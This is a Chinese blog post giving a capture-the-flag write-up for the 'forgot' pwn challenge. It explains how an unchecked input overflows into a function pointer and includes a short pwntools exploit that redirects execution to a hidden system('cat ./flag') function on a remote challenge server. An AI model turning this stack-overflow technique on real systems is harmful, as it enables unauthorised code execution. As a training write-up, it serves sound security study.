攻防世界进阶区forgot

字数:420字 | 预计阅读时长:1分钟

[攻防世界]进阶区forgot

进阶区第一道题,还算简单的一道题
先查看文件的属性及保护措施
checksec检查
发现只开了NX,没有canary就意味着可以直接栈溢出

看字符串窗口发现有system也有cat flag,点进去查看引用


发现在sub_80486CC函数里,而这个函数的作用其实就是构造一个system(“cat ./flag”),就是说只要跳转到这个函数就能直接拿到flag
接下来找漏洞,最好有栈溢出可以直接覆盖返回地址到0x80486CC
main里就存在一个很明显的溢出漏洞


没有限制v2的输入,所以可以让v2溢出。
而main函数最后有一句 (*(&v3 + –v14))() ,这句意思就是调用 (指针v3 + (v14 - 1))所指向的函数,如果v14等于1,那么这句话调用的就是v3原本指向的函数
而在栈里,v2在v3的上方(var_74是v2,anonymous_1是v3)

所以可以让v2溢出,来改变v3指向的地址值。

思路:

  1. 第一次输入随便输
  2. 第二次输入让v2溢出,并且每位必须不符合条件,使v14的值一直是1
    看代码可知只要不满足这些条件即可
  3. 溢出覆盖v3指向的地址,改成0x80486CC
  4. 拿到flag

    EXP:

1
2
3
4
5
6
7
8
from pwn import *

payload = 'A'*32 + p32(0x80486CC)

p = remote('111.198.29.45',43991)
p.sendlineafter('> ','abcd')
p.sendlineafter('> ',payload)
p.interactive()

payload解释:

  1. ‘A’*32:只要不满足条件,随便什么字符都可以,比如a不行,A可以;v2到v3间距(0x74-0x54)即32,所以’A’*32
  2. p32(0x80486CC):32位程序用p32打包,里面的是函数sub_80486CC的地址,让v3指向该地址

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */